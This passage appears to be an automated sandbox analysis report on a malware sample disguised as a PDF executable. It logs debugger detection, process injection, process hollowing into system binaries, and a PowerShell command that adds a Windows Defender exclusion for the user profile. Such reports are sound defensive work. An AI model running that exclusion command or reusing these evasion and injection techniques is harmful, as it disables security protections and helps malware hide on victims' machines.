Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h]	6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h]	6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h]	6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h]	6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h]	6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h]	6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h]	6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h]	6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h]	6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h]	6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059651ED mov eax, dword ptr fs:[00000030h]	6_2_059651ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595B136 mov eax, dword ptr fs:[00000030h]	6_2_0595B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595B136 mov eax, dword ptr fs:[00000030h]	6_2_0595B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595B136 mov eax, dword ptr fs:[00000030h]	6_2_0595B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595B136 mov eax, dword ptr fs:[00000030h]	6_2_0595B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05961131 mov eax, dword ptr fs:[00000030h]	6_2_05961131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05961131 mov eax, dword ptr fs:[00000030h]	6_2_05961131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A20115 mov eax, dword ptr fs:[00000030h]	6_2_05A20115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A0A118 mov ecx, dword ptr fs:[00000030h]	6_2_05A0A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A0A118 mov eax, dword ptr fs:[00000030h]	6_2_05A0A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A0A118 mov eax, dword ptr fs:[00000030h]	6_2_05A0A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A0A118 mov eax, dword ptr fs:[00000030h]	6_2_05A0A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05990124 mov eax, dword ptr fs:[00000030h]	6_2_05990124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05966154 mov eax, dword ptr fs:[00000030h]	6_2_05966154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05966154 mov eax, dword ptr fs:[00000030h]	6_2_05966154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595C156 mov eax, dword ptr fs:[00000030h]	6_2_0595C156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05967152 mov eax, dword ptr fs:[00000030h]	6_2_05967152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F8158 mov eax, dword ptr fs:[00000030h]	6_2_059F8158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F4144 mov eax, dword ptr fs:[00000030h]	6_2_059F4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F4144 mov eax, dword ptr fs:[00000030h]	6_2_059F4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F4144 mov ecx, dword ptr fs:[00000030h]	6_2_059F4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F4144 mov eax, dword ptr fs:[00000030h]	6_2_059F4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F4144 mov eax, dword ptr fs:[00000030h]	6_2_059F4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05959148 mov eax, dword ptr fs:[00000030h]	6_2_05959148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05959148 mov eax, dword ptr fs:[00000030h]	6_2_05959148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05959148 mov eax, dword ptr fs:[00000030h]	6_2_05959148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05959148 mov eax, dword ptr fs:[00000030h]	6_2_05959148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F3140 mov eax, dword ptr fs:[00000030h]	6_2_059F3140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F3140 mov eax, dword ptr fs:[00000030h]	6_2_059F3140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F3140 mov eax, dword ptr fs:[00000030h]	6_2_059F3140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F9179 mov eax, dword ptr fs:[00000030h]	6_2_059F9179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A35152 mov eax, dword ptr fs:[00000030h]	6_2_05A35152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05965096 mov eax, dword ptr fs:[00000030h]	6_2_05965096
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599909C mov eax, dword ptr fs:[00000030h]	6_2_0599909C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598D090 mov eax, dword ptr fs:[00000030h]	6_2_0598D090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598D090 mov eax, dword ptr fs:[00000030h]	6_2_0598D090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595D08D mov eax, dword ptr fs:[00000030h]	6_2_0595D08D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A260B8 mov eax, dword ptr fs:[00000030h]	6_2_05A260B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A260B8 mov ecx, dword ptr fs:[00000030h]	6_2_05A260B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596208A mov eax, dword ptr fs:[00000030h]	6_2_0596208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059ED080 mov eax, dword ptr fs:[00000030h]	6_2_059ED080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059ED080 mov eax, dword ptr fs:[00000030h]	6_2_059ED080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F80A8 mov eax, dword ptr fs:[00000030h]	6_2_059F80A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E20DE mov eax, dword ptr fs:[00000030h]	6_2_059E20DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059890DB mov eax, dword ptr fs:[00000030h]	6_2_059890DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov ecx, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov ecx, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov ecx, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov ecx, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DD0C0 mov eax, dword ptr fs:[00000030h]	6_2_059DD0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DD0C0 mov eax, dword ptr fs:[00000030h]	6_2_059DD0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595C0F0 mov eax, dword ptr fs:[00000030h]	6_2_0595C0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A20F0 mov ecx, dword ptr fs:[00000030h]	6_2_059A20F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595A0E3 mov ecx, dword ptr fs:[00000030h]	6_2_0595A0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A350D9 mov eax, dword ptr fs:[00000030h]	6_2_05A350D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059850E4 mov eax, dword ptr fs:[00000030h]	6_2_059850E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059850E4 mov ecx, dword ptr fs:[00000030h]	6_2_059850E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E60E0 mov eax, dword ptr fs:[00000030h]	6_2_059E60E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059680E9 mov eax, dword ptr fs:[00000030h]	6_2_059680E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597E016 mov eax, dword ptr fs:[00000030h]	6_2_0597E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597E016 mov eax, dword ptr fs:[00000030h]	6_2_0597E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597E016 mov eax, dword ptr fs:[00000030h]	6_2_0597E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597E016 mov eax, dword ptr fs:[00000030h]	6_2_0597E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2903E mov eax, dword ptr fs:[00000030h]	6_2_05A2903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2903E mov eax, dword ptr fs:[00000030h]	6_2_05A2903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2903E mov eax, dword ptr fs:[00000030h]	6_2_05A2903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2903E mov eax, dword ptr fs:[00000030h]	6_2_05A2903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E4000 mov ecx, dword ptr fs:[00000030h]	6_2_059E4000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F6030 mov eax, dword ptr fs:[00000030h]	6_2_059F6030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595A020 mov eax, dword ptr fs:[00000030h]	6_2_0595A020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595C020 mov eax, dword ptr fs:[00000030h]	6_2_0595C020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A35060 mov eax, dword ptr fs:[00000030h]	6_2_05A35060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05962050 mov eax, dword ptr fs:[00000030h]	6_2_05962050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598B052 mov eax, dword ptr fs:[00000030h]	6_2_0598B052
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E6050 mov eax, dword ptr fs:[00000030h]	6_2_059E6050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05971070 mov eax, dword ptr fs:[00000030h]	6_2_05971070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05971070 mov ecx, dword ptr fs:[00000030h]	6_2_05971070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05971070 mov eax, dword ptr fs:[00000030h]	6_2_05971070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05971070 mov eax, dword ptr fs:[00000030h]	6_2_05971070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05971070 mov eax, dword ptr fs:[00000030h]	6_2_05971070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05971070 mov eax, dword ptr fs:[00000030h]	6_2_05971070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05971070 mov eax, dword ptr fs:[00000030h]	6_2_05971070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05971070 mov eax, dword ptr fs:[00000030h]	6_2_05971070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05971070 mov eax, dword ptr fs:[00000030h]	6_2_05971070

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\SysWOW64\ipconfig.exe

Code function: 9_2_00DE39FE FormatMessageW,ConvertLengthToIpv4Mask,InetNtopW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,LocalFree,LocalAlloc,GetAdaptersAddresses,LocalFree,

9_2_00DE39FE

Enables debug privileges

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7854F20 RtlAddVectoredExceptionHandler,RaiseFailFastException,	0_2_00007FF7D7854F20
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D78BBE8C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF7D78BBE8C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00DE53F0 SetUnhandledExceptionFilter,	9_2_00DE53F0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00DE51A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_00DE51A0

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory allocated: C:\Windows\System32\calc.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory allocated: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory allocated: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 400000 protect: page execute and read and write

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF728280000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Windows\System32\calc.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Windows\System32\cmd.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Windows\System32\svchost.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 400000 value starts with: 4D5A

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: NULL target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: NULL target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Section loaded: NULL target: C:\Windows\System32\conhost.exe protection: execute and read and write
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Section loaded: NULL target: C:\Windows\System32\conhost.exe protection: execute and read and write
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: NULL target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: NULL target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread register set: target process: 4004	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Thread register set: target process: 4004	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Thread register set: target process: 4004
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Thread register set: target process: 4004
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Thread register set: target process: 4004

Queues an APC in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section unmapped: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base address: 400000	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base address: 400000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: DE0000	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section unmapped: C:\Windows\System32\calc.exe base address: 400000	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section unmapped: C:\Windows\System32\cmd.exe base address: 400000	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section unmapped: C:\Windows\System32\svchost.exe base address: 400000	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section unmapped: C:\Program Files (x86)\Internet Explorer\iexplore.exe base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Section unmapped: C:\Windows\System32\conhost.exe base address: C90000
Source: C:\Users\user\101 2043 5770 pdf.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base address: 400000
Source: C:\Users\user\101 2043 5770 pdf.exe	Section unmapped: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base address: 400000
